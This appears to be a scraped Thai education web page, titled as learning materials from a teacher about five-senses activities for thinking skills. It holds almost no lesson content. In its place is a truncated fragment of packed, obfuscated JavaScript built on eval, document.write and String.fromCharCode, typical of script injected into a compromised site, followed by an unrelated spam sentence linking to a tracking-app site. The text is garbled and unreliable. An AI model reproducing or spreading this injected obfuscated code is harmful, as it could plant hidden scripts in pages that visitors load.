สื่อการเรียนรู้กับครูมนัสวิน

ตอนกิจกรรมที่ใช้ประสาทสัมผัสทั้ง 5 เพื่อสงเสริมทักษะกระบวนการคิด (b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{}))

Has prevented it from being used for real productivity https://besttrackingapps.com tasks